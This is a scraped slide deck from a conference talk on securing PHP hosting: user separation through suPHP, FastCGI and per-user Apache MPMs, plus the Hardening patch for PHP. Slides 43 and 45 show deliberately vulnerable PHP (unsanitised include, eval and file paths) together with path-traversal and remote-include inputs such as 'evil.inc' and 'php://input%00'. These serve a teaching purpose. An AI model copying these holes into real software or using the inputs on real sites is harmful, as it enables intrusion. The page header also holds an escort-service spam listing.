08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Secure PHP environment

  • 1. Secure PHP environment Stefan Neufeind SpeedPartner GmbH
  • 2. 2 About me  Stefan Neufeind  From Neuss (near Düsseldorf, Germany)  Working for SpeedPartner GmbH (consulting, development, administration)  PEAR-developer  Loves PHP / FOSS :-)
  • 3. 3 Agenda  Basic steps, Common beliefs  Server environment  Separating users  CGI  FastCGI  MPM („inside“ Apache)  Delivering static files  Hardening PHP  Links
  • 4. 4 Basic steps  Physical security  Direct access to server / data possible?  Network security  Connected to Internet?  Firewalled?  Security monitored?
  • 5. 5 Basic steps  Application security  Base system  Webserver  PHP  Webapplications  Other applications on same server  Any „unneeded“ services available?
  • 6. 6 Basic steps  Application security (continued)  Patches applied  Configuration „carefully“ done  Users / applications on the system  Separation of rights / services
  • 7. 7 Basic steps Your personal „mix“ of: Performance Resources Security Ease of use
  • 8. 8 Basic steps  Security-lifecycle  Requirements: Identify needs / use-cases  Design: Define rules  Implementation: Apply rules  Verification: Monitor rules  Continuing process of improvement  Review critically
  • 9. 9 Common beliefs  “A standard installation is secure.”  Usually not (unless it does not expose any services etc.)  “I have only secure applications installed.”  How can you be sure?  Did you re-check this assumption lately? (security warnings, patches, audits, ...)
  • 10. 10 Common beliefs  “My users know what they are doing.”  What are they doing?  Do they know and follow the rules?  “None of the users would try to break anything.”  Always somebody will try out something.  If smallest „holes“ exist, they might be found.
  • 11. 11 Server environment  Run minimal services  Apache, MySQL, ...  Expose only needed services to the net  Apache, ...  Firewalling  Also host-based  Rate-limiting, limit outgoing connections, ...  Restrictive file-/dir-permissions
  • 12. 12 Server environment  PHP:  Secure configuration (no register_globals, ...)  Separate user-rights of scripts  Use safety-checks:  In application-code  Inside PHP (Hardening patch for PHP → later)
  • 13. 13 Separating users Concepts:  PHP with safe_mode  Too restrictive for some scripts  Only “fake” separation of users  Does not work for other CGIs  Running one instance for each user  User-switching where needed  User-switching where possible
  • 14. 14 User-switching via CGI Pros:  „Easy” to use  Stable  (Quite) secure Cons:  Slow  PHP also as CGI  No switching for static content
  • 15. 15 User-switching via CGI Solutions:  mod_suexec (from Apache)  suPHP  mod_suid  only for Apache 1.x, old  mod_cgiwrap  only for Apache 1.x, officially discontinued
  • 16. 16 User-switching via CGI suPHP:  Runs php-scripts without #! in first line  Allows running php3/4/5 in parallel  Special enviroment-setup for PHP  Also runs normal CGIs
  • 17. 17 User-switching via CGI suPHP – Apache-configuration: AddHandler php5-script .php5 <Directory /> AddHandler x-httpd-php .php suPHP_AddHandler x-httpd-php # optional: suPHP_UserGroup username groupname </Directory> suPHP_Engine on
  • 18. 18 User-switching via CGI suPHP – excerpts from /etc/suphp.conf: webserver_user=apache ;Path all scripts have to be in docroot=/var/www ;Check wheter script is within DOCUMENT_ROOT check_vhost_docroot=true ;Umask to set, specify in octal notation umask=0077
  • 19. 19 User-switching via CGI suPHP – excerpts from /etc/suphp.conf: ; Security options allow_file_group_writeable=false allow_file_others_writeable=false allow_directory_group_writeable=false allow_directory_others_writeable=false ; Minimum UID/GID min_uid=48 min_gid=48
  • 20. 20 User-switching via CGI suPHP – excerpts from /etc/suphp.conf: [handlers] ;Handler for php-scripts x-httpd-php=php:/usr/bin/php-cgi ;Handler for CGI-scripts x-suphp-cgi=execute:!self
  • 21. 21 User-switching via FastCGI Pros:  Faster than CGI  Stable  Platform- independent  Runnable remote from webserver Cons:  Fixed number of instances per user  Only for FastCGI- enabled programs (e.g. PHP)  No switching for static content
  • 22. 22 User-switching via FastCGI  Instances of FastCGI-program running without being closed  Saves fork() etc. on every request  Communication to webserver using domain-sockets or TCP/IP instead of pipes  Allows running remote from webserver
  • 23. 23 User-switching via FastCGI Apache-configuration, global:  Instead of „-socket” use “-host” for remote connections via TCP/IP  Colon in socket-name due to PHP-bug <IfModule mod_fastcgi.c> FastCgiExternalServer /var/run/php- fastcgi/fcgi-bin/demouser/php4 -socket /var/run/php-fastcgi/sockets/demouser:php4 </IfModule>
  • 24. 24 User-switching via FastCGI Apache-configuration, virtualhost/directory:  Last argument to “ScriptAlias” is identifier  Identifier used for mapping internally; (should exist in filesystem for compatibility with Apache 1.x/2.x) AddHandler php-cgi .php Action php-cgi /cgi-bin/php4 ScriptAlias /cgi-bin/php4 /var/run/php- fastcgi/fcgi-bin/demouser/php4
  • 25. 25 User-switching via FastCGI Configurations via environment:  PHP_FCGI_CHILDREN number of PHP children to spawn  PHP_FCGI_MAX_REQUESTS number of requests served by a single php-process until it is restarted
  • 26. 26 User-switching inside Apache Pros:  Faster than CGI  Switches Apache- instance completely  Also static content user-switched Cons:  Not recommended for production  No official (working) Apache-module  Module must match Apache-version
  • 27. 27 User-switching inside Apache Solutions via MPM for Apache 2.x: (MPM = Multi-Processing Module)  perchild (from Apache)  Official statement: “module is not functional” “Do not use unless [...] willing to help fix it.”  MetuxMPM  Chaotic development; not up2date  peruser (from Telena)
  • 28. 28 User-switching inside Apache Roots of implementations: peruser (bit more advanced) MetuxMPM (not for current Apache) perchild (not functional) based on based on
  • 29. 29 User-switching inside Apache peruser MPM:  Works for Apache 2.0.52, newer patches under development  Used in production, but recommended „If it breaks, you get to keep both pieces :)”  Problems with mod_ssl  Use proxy such as “Pound” in front  Disable Keepalive to avoid problems
  • 30. 30 User-switching inside Apache Apache-configuration, global: <IfModule peruser.c> ServerLimit 256 MaxClients 256 MinSpareProcessors 2 MaxProcessors 10 MaxRequestsPerChild 1000 # kill idle procs after XX seconds ExpireTimeout 1800 Multiplexer nobody nobody
  • 31. 31 User-switching inside Apache Apache-configuration, global:  Use one “Processor”-directive for each user/group/chroot-combination needed Processor user group /home/user # chroot dir is optional: # Processor user group </IfModule> # KeepAlive *MUST* be off KeepAlive Off
  • 32. 32 User-switching inside Apache Apache-configuration, virtualhost/directory: <IfModule peruser.c> # must match a defined Processor ServerEnvironment user group /home/user # optional MinSpareProcessors 4 MaxProcessors 20 </IfModule>
  • 33. 33 Delivering static files  Separating users desired  No access to foreign files  Not even for static files, not even read  Works fine with fully user-switched Apache (MPM)  But how with user-switched CGI/FastCGI?
  • 34. 34 Delivering static files  Possible solution:  Apache in all user-groups  Just read-access for Apache  Possiblity to prevent access for Apache to specific files (configs, logs, PHP, ...)  Linux 2.4: 32 groups per user  Linux 2.6: 65535 groups per user
  • 35. 35 Delivering static files  Files for testing  Excerpt from /etc/group: -rw-r----- user1000 group1000 file1000.txt -rw-r----- user1001 group1001 file1001.txt -rw-r----- user1002 group1002 file1002.txt -rw------- user1002 group1002 script1002.txt group1000:x:1000:apache group1001:x:1001:apache group1002:x:1002:apache
  • 36. 36 Hardening PHP  Former “Hardened-PHP”, now “Hardening patch for PHP”  Adds extra checks, limitations and filters  Backports some security-improvements
  • 37. 37 Hardening PHP New checks/features for:  Engine  Runtime  Filtering  Logging
  • 38. 38 Hardening PHP Engine features:  Zend Memory Manager: Canary and safe unlink protection  Zend Linked List: Canary protection  Zend HashTables: Destructor canary protection  Protection of the PHP core and extensions against format string vulnerabilities
  • 39. 39 Hardening PHP Runtime features:  Execution depth limit  Separated function whitelists and blacklists in normal and in eval() mode  Failing SQL queries within the MySQL/MySQLi/fbsql/pgsql/sqlite extensions can be logged  Script can abort after failed SQL Query
  • 40. 40 Hardening PHP Runtime features (continued):  Multiple HTTP headers in one header() call forbidden by default  Include filename limits  Overlong filename filter  URL filter (optional whitelist/blacklist)  Uploaded files filter  Truncated filename filter
  • 41. 41 Hardening PHP Runtime features (continued):  Superglobals protected against extract()/import_request_vars()  memory_limit cannot be raised above configured limit  realpath() replacement function  Prevents problems on some platforms (Linux, BSD, ...)
  • 42. 42 Hardening PHP Runtime – superglobals (example): Without superglobal-protection $_SERVER might have been overwritten. <?php // ... extract($_GET); echo $_SERVER['DOCUMENT_ROOT']; //... ?>
  • 43. 43 Hardening PHP Runtime – path checking (example): Choose $nr = "15.txt/../../def" Actually reading /def.txt Hardened PHP would find out that /abc/artikel_15.txt is no directory <?php // ... $a=file_get_contents("/abc/artikel_$nr.txt"); echo $a; ?>
  • 44. 44 Hardening PHP Runtime configurations (php.ini, excerpt):  hphp.executor.include.whitelist / blacklist  Beginning of URL schemes to allow includes from (also php://stdin)  hphp.executor.func.whitelist / blacklist  hphp.executor.eval.whitelist / blacklist
  • 45. 45 Hardening PHP Runtime – include and eval (example):  Arbitrary (remote?) includes  action=http://example.com/evil.inc  action=php://input%00  Function-calls via eval <?php include $_GET['module'].'-module.php'; eval('module_'.$_GET['module'].'_init()'); ?>
  • 46. 46 Hardening PHP Filtering features:  GET, POST, COOKIE variables with following names not registered:  GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST  _REQUEST, _SERVER, _SESSION, HTTP_COOKIE_VARS  HTTP_ENV_VARS, HTTP_GET_VARS, HTTP_POST_FILES,  HTTP_POST_VARS, HTTP_RAW_POST_DATA,  HTTP_SERVER_VARS, HTTP_SESSION_VARS
  • 47. 47 Hardening PHP Filtering features (continued):  Limits can be enforced on COOKIE, GET or POST variables or all REQUEST vars  Number of variables  Maximum length of variable name  Maximum length of array indices  Maximum length of variable value  Maximum depth of array
  • 48. 48 Hardening PHP Filtering features (continued):  Allow/disallow %00 in user-input  Limit for number of uploadable files  Hook for variable name checks before file upload  Uploaded ELF files can be filtered  External verification script for uploaded files
  • 49. 49 Hardening PHP Filtering features (examples):  %00 (binary null) used to terminate strings Can prevent some functions to check beyond this artificial “end of string”  Check filenames before passed to script  Allow virus-scans, rejecting certain files, ...
  • 50. 50 Hardening PHP Logging features:  Logging of ALERT classes configurable by class  Syslog facility and priority configurable  ALERTS loggable by SAPI error log  ALERTS loggable by external script  Attackers IP addresses can be extracted from X-Forwarded-For headers
  • 51. 51 Hardening PHP Pros:  „Paranoid“ checks  Can prevent unknown exploits  Additional security without touching scripts Cons:  Security vs. performance / resources  Some rules might be “too restrictive” initially  Adjust carefully where needed
  • 52. 52 Links  CGI-userswitching for Apache:  mod_suexec http://httpd.apache.org/docs/2.0/mod/mod_suexec.html  suphp http://www.suphp.org/  mod_suid http://www.palsenberg.com/index.php/plain/projects/  mod_cgiwrap http://mod-cgiwrap.sourceforge.net/
  • 53. 53 Links  MPMs for Apache:  Perchild (from Apache) http://httpd.apache.org/docs/2.0/mod/perchild.html  MetuxMPM:  Official: http://www.metux.de/mpm/  Unofficial: http://www.sannes.org/metuxmpm/  Peruser (from Telena) http://www.telana.com/peruser.php
  • 54. 54 Links / Thanks  FastCGI http://www.fastcgi.com/  Hardending patch for PHP http://www.hardened-php.org/  PHP Professionell (German magazine, article on hardening PHP) Thanks go to:  Hilko Bengen (FastCGI)  Stefan Esser (Hardened PHP)
  • 55. 55 Thank you! Up-to-date slides available at: http://talks.speedpartner.de/ Questions? neufeind (at) speedpartner.de